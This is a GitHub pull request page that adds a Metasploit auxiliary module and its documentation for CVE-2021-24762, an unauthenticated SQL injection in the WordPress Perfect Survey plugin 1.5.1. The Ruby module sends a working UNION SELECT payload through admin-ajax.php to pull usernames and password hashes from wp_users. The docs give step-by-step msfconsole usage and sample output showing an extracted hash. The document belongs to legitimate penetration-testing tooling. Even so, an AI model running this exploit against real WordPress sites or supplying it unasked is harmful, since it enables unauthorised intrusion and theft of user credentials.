Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New Auxiliary Module for CVE-2021-24762: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) #19701

Merged
merged 14 commits into from
Dec 10, 2024
Merged
Show file tree
Hide file tree
Changes from 10 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -0,0 +1,51 @@
## Vulnerable Application

Perfect Survey, a WordPress plugin, version 1.5.1 is affected by an unauthenticated SQL injection vulnerability
via the `question_id` parameter.

An unauthenticated attacker can exploit this SQL injection vulnerability to retrieve sensitive information,
such as usernames and password hashes, from the `wp_users` table.

The vulnerable plugin can be downloaded from the [WordPress plugin repository](https://wordpress.org/plugins/).
The specific vulnerable version can be found here: https://www.exploit-db.com/apps/51c80e6262c3a39fa852ebf96ff86b78-perfect-survey.1.5.1.zip

## Verification Steps

1. Install the WordPress application and the vulnerable version of the Perfect Survey plugin.
2. Start `msfconsole`.
3. Run: `use auxiliary/scanner/http/wp_perfect_survey_sqli`.
4. Set the target host: `set RHOSTS [ip]`.
5. Adjust other options as necessary, such as `TARGETURI` (default is `/`).
6. Execute the module: `run`.
7. The module should retrieve usernames and password hashes from the WordPress installation.

## Options

### SHOW_FULL_RESPONSE
If set to `true`, the module will print the entire JSON response received from the server when username and password hash extraction fails.
Default is `false`.

## Scenarios

### WordPress with Perfect Survey Plugin 1.5.1 on Ubuntu 20.04

#### Example

```sh
msf6 > use auxiliary/scanner/http/wp_perfect_survey_sqli
[*] Using auxiliary/scanner/http/wp_perfect_survey_sqli
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set RPORT 8000
RPORT => 8000
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > exploit
[*] Running module against 192.168.1.104

[*] Exploiting SQLi in Perfect Survey plugin...
[+] Received a response from the server!
[+] Extracted Username: aaryan
[+] Extracted Password Hash: $P$BroxbUQTM0N32U7JeMmkXPJrxN9ErZ1
[*] Auxiliary module execution completed
```
87 changes: 87 additions & 0 deletions modules/auxiliary/scanner/http/wp_perfect_survey_sqli.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,87 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress Plugin Perfect Survey 1.5.1 SQLi (Unauthenticated)',
'Description' => %q{
This module exploits a SQL injection vulnerability in the Perfect Survey
plugin for WordPress (version 1.5.1). An unauthenticated attacker can
exploit the SQLi to retrieve sensitive information such as usernames
and password hashes from the `wp_users` table.
},
'Author' => [
'Aaryan Golatkar', # Metasploit Module Creator
'Ron Jost' # Vulnerability discovery
],
'License' => MSF_LICENSE,
'References' => [
['EDB', '50766'],
['CVE', '2021-24762']
],
'DisclosureDate' => '2021-10-05',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path to the WordPress installation', '/']),
OptBool.new('SHOW_FULL_RESPONSE', [false, 'Show the entire JSON response if username and password hash are not extracted', false]),
aaryan-11-x marked this conversation as resolved.
Show resolved Hide resolved
Opt::RPORT(80) # Default port for HTTP
])
end

aaryan-11-x marked this conversation as resolved.
Show resolved Hide resolved
def run
print_status('Exploiting SQLi in Perfect Survey plugin...')

# The vulnerable endpoint
endpoint = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')

# SQL injection payload
sqli_payload = '1 union select 1,1,char(116,101,120,116),user_login,user_pass,0,0,null,null,null,null,null,null,null,null,null from wp_users'

# HTTP GET request parameters
params = {
'action' => 'get_question',
'question_id' => sqli_payload
}

# Send the request
res = send_request_cgi({
'uri' => endpoint,
'method' => 'GET',
'vars_get' => params
})

fail_with(Failure::Unreachable, 'Connection failed') unless res
fail_with(Failure::Unknown, 'Unexpected reply from the server') unless res.code == 200

print_status('Received a response from the server!')

html_content = res.get_json_document['html']
fail_with(Failure::Unknown, 'HTML content is empty') unless html_content

# Use regex to extract username and the password hash
match_data = /survey_question_p">([^<]+)[^$]+(\$P\$[^"]+)/.match(html_content)
if match_data
username, password_hash = match_data.captures
print_good("Extracted credentials: #{username}:#{password_hash}")
else
print_warning('Could not extract username and password hash. Try enabling SHOW_FULL_RESPONSE.')
print_status("Full Response (HTML):\n#{html_content}") if datastore['SHOW_FULL_RESPONSE']
end
rescue JSON::ParserError => e
fail_with(Failure::UnexpectedReply, "Failed to parse response as JSON: #{e.message}")
end
aaryan-11-x marked this conversation as resolved.
Show resolved Hide resolved
end